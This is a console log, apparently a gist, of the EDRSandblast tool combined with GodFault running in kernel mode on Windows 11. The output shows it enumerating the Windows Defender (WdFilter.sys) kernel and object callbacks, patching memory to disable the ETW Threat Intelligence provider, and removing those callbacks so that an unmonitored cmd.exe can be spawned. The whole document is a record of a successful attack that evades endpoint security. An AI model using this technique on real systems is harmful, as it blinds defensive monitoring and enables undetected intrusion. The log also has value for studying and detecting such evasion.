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Created June 1, 2023 22:30
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C:\Users\user\Desktop\Offsets>EDRSandblast.exe --kernelmode cmd
______ _____ _____ _____ _ _ _ _
| ____| __ \| __ \ / ____| | | | | | | |
| |__ | | | | |__) | (___ __ _ _ __ __| | |__ | | __ _ ___| |_
| __| | | | | _ / \___ \ / _` | '_ \ / _` | '_ \| |/ _` / __| __|
| |____| |__| | | \ \ ____) | (_| | | | | (_| | |_) | | (_| \__ | |_
|______|_____/|_| \_|_____/ \__,_|_| |_|\__,_|_.__/|_|\__,_|___/\__|
D3FC0N 30 Edition | Thomas DIOT (@_Qazeer) & Maxime MEIGNAN (@th3m4ks)
[!] If kernel mode bypass is enabled, it is recommended to enable usermode bypass as well (e.g. to unhook the NtLoadDriver API call)
[===== KERNEL MODE =====]
[+] Setting up prerequisites for the kernel read/write primitives...
[+] Loading kernel related offsets from the CSV file
[*] System's ntoskrnl.exe file version is: ntoskrnl_22621-1702.exe
[+] Offsets are available for this version of ntoskrnl.exe (ntoskrnl_22621-1702.exe)!
[+] Checking if any EDR kernel notify rountines are set for image loading, process and thread creations...
[+] [NotifyRountines] Enumerating process creation callbacks
[+] Running command: GodFault.exe -t 2684
[?] Server does not appear to be running. Attempting to install it...
[+] CSRSS PID is 748
[+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] Thread 2684 (KTHREAD FFFF910961E4C080) has been blessed by GodFault
[+] [NotifyRountines] fffff8034df25500 [cng.sys + 0x5500]
[+] [NotifyRountines] fffff8034e9efdc0 [WdFilter.sys + 0x4fdc0]
[+] [NotifyRountines] Found callback belonging to EDR driver WdFilter.sys
[+] [NotifyRountines] fffff803487bc460 [ksecdd.sys + 0x1c460]
[+] [NotifyRountines] fffff8034eff3fd0 [tcpip.sys + 0x13fd0]
[+] [NotifyRountines] fffff8034f5ed980 [iorate.sys + 0xd980]
[+] [NotifyRountines] fffff8034dea8890 [CI.dll + 0x88890]
[+] [NotifyRountines] fffff803525079f0 [dxgkrnl.sys + 0x179f0]
[+] [NotifyRountines] fffff80352be0a70 [vm3dmp.sys + 0x10a70]
[+] [NotifyRountines] fffff8036ebccd00 [peauth.sys + 0x3cd00]
[+] [NotifyRountines] fffff8036eda1550 [wtd.sys + 0x1550]
[+] [NotifyRountines] Found a total of 1 EDR / security products driver(s)
[+] [NotifyRountines] Enumerating thread creation callbacks
[+] [NotifyRountines] fffff8034e9f15c0 [WdFilter.sys + 0x515c0]
[+] [NotifyRountines] Found callback belonging to EDR driver WdFilter.sys
[+] [NotifyRountines] fffff8034e9f1350 [WdFilter.sys + 0x51350]
[+] [NotifyRountines] Found callback belonging to EDR driver WdFilter.sys
[+] [NotifyRountines] fffff8036eb71010 [mmcss.sys + 0x1010]
[+] [NotifyRountines] Found a total of 2 EDR / security products driver(s)
[+] [NotifyRountines] Enumerating image loading callbacks
[+] [NotifyRountines] fffff8034e9f0820 [WdFilter.sys + 0x50820]
[+] [NotifyRountines] Found callback belonging to EDR driver WdFilter.sys
[+] [NotifyRountines] fffff80352ab5710 [ahcache.sys + 0x25710]
[+] [NotifyRountines] Found a total of 1 EDR / security products driver(s)
[+] Checking if EDR callbacks are registered on processes and threads handle creation/duplication...
[+] [ObjectCallblacks] Enumerating Process object callbacks :
[+] [ObjectCallblacks] Callback at FFFF800C5E2F2940 for handle creations & duplications:
[+] [ObjectCallblacks] Status: Enabled
[+] [ObjectCallblacks] Preoperation at 0xfffff8034e9eda30 [WdFilter.sys + 0x4da30]
[+] [ObjectCallblacks] Callback belongs to an EDR and is enabled!
[+] [ObjectCallblacks] Enumerating Thread object callbacks :
[+] [ObjectCallblacks] Object callbacks are present !
[+] [ETWTI] Checking the ETW Threat Intelligence Provider state...
[+] [ETWTI] ETW Threat Intelligence Provider is ENABLED!
[+] Process is NOT "safe" to launch our payload, removing monitoring and starting another process...
[+] [ETWTI] Disabling the ETW Threat Intel provider by patching ProviderEnableInfo at 0xffff91095ce8c430 with 0x00.
[+] [ETWTI] The ETW Threat Intel provider was successfully disabled!
[+] Removing kernel callbacks registered by EDR for process creation, thread creation and image loading...
[+] [NotifyRountines] Removing process creation callbacks
[+] [NotifyRountines] Removing callback of EDR driver "WdFilter.sys" [callback addr: 0xfffff8034970c2a8 | callback struct: 0xffff91095dbf3a5f | callback function: 0xfffff8034e9efdc0]
[+] [NotifyRountines] Removing thread creation callbacks
[+] [NotifyRountines] Removing callback of EDR driver "WdFilter.sys" [callback addr: 0xfffff8034970c4a0 | callback struct: 0xffff91095dbf3b1f | callback function: 0xfffff8034e9f15c0]
[+] [NotifyRountines] Removing callback of EDR driver "WdFilter.sys" [callback addr: 0xfffff8034970c4a8 | callback struct: 0xffff91095dbf3b4f | callback function: 0xfffff8034e9f1350]
[+] [NotifyRountines] Removing image loading callbacks
[+] [NotifyRountines] Removing callback of EDR driver "WdFilter.sys" [callback addr: 0xfffff8034970c6a0 | callback struct: 0xffff91095dbf3e4f | callback function: 0xfffff8034e9f0820]
[+] Disabling kernel callbacks registered by EDR for process and thread opening or handle duplication...
[+] [ObjectCallblacks] Disabling WdFilter.sys callback...
[+] All EDR drivers were successfully removed from Kernel callbacks!
Starting a new unmonitored process...
[!] If kernel mode bypass is enabled, it is recommended to enable usermode bypass as well (e.g. to unhook the NtLoadDriver API call)
[===== KERNEL MODE =====]
[+] Setting up prerequisites for the kernel read/write primitives...
[+] Loading kernel related offsets from the CSV file
[*] System's ntoskrnl.exe file version is: ntoskrnl_22621-1702.exe
[+] Offsets are available for this version of ntoskrnl.exe (ntoskrnl_22621-1702.exe)!
[+] Checking if any EDR kernel notify rountines are set for image loading, process and thread creations...
[+] [NotifyRountines] Enumerating process creation callbacks
[+] Running command: GodFault.exe -t 8344
[+] Thread 8344 (KTHREAD FFFF91096169F080) has been blessed by GodFault
[+] Initial blessing successful
[+] [NotifyRountines] fffff8034df25500 [cng.sys + 0x5500]
[+] [NotifyRountines] fffff803487bc460 [ksecdd.sys + 0x1c460]
[+] [NotifyRountines] fffff8034eff3fd0 [tcpip.sys + 0x13fd0]
[+] [NotifyRountines] fffff8034f5ed980 [iorate.sys + 0xd980]
[+] [NotifyRountines] fffff8034dea8890 [CI.dll + 0x88890]
[+] [NotifyRountines] fffff803525079f0 [dxgkrnl.sys + 0x179f0]
[+] [NotifyRountines] fffff80352be0a70 [vm3dmp.sys + 0x10a70]
[+] [NotifyRountines] fffff8036ebccd00 [peauth.sys + 0x3cd00]
[+] [NotifyRountines] fffff8036eda1550 [wtd.sys + 0x1550]
[+] [NotifyRountines] No EDR driver(s) found!
[+] [NotifyRountines] Enumerating thread creation callbacks
[+] [NotifyRountines] fffff8036eb71010 [mmcss.sys + 0x1010]
[+] [NotifyRountines] No EDR driver(s) found!
[+] [NotifyRountines] Enumerating image loading callbacks
[+] [NotifyRountines] fffff80352ab5710 [ahcache.sys + 0x25710]
[+] [NotifyRountines] No EDR driver(s) found!
[+] Checking if EDR callbacks are registered on processes and threads handle creation/duplication...
[+] [ObjectCallblacks] Enumerating Process object callbacks :
[+] [ObjectCallblacks] Callback at FFFF800C5E2F2940 for handle creations & duplications:
[+] [ObjectCallblacks] Status: Disabled
[+] [ObjectCallblacks] Preoperation at 0xfffff8034e9eda30 [WdFilter.sys + 0x4da30]
[+] [ObjectCallblacks] Callback belongs to an EDR but is disabled.
[+] [ObjectCallblacks] Enumerating Thread object callbacks :
[+] [ObjectCallblacks] Object callbacks are not found !
[+] [ETWTI] Checking the ETW Threat Intelligence Provider state...
[+] [ETWTI] ETW Threat Intelligence Provider is DISABLED!
[+] Process is "safe" to launch our payload
[+] Kernel callbacks have normally been removed, starting cmd.exe
WARNING: EDR kernel callbacks will be restored after exiting the cmd prompt (by typing exit)
WARNING: While unlikely, the longer the callbacks are removed, the higher the chance of being detected / causing a BSoD upon restore is!
Microsoft Windows [Version 10.0.22621.1702]
(c) Microsoft Corporation. All rights reserved.
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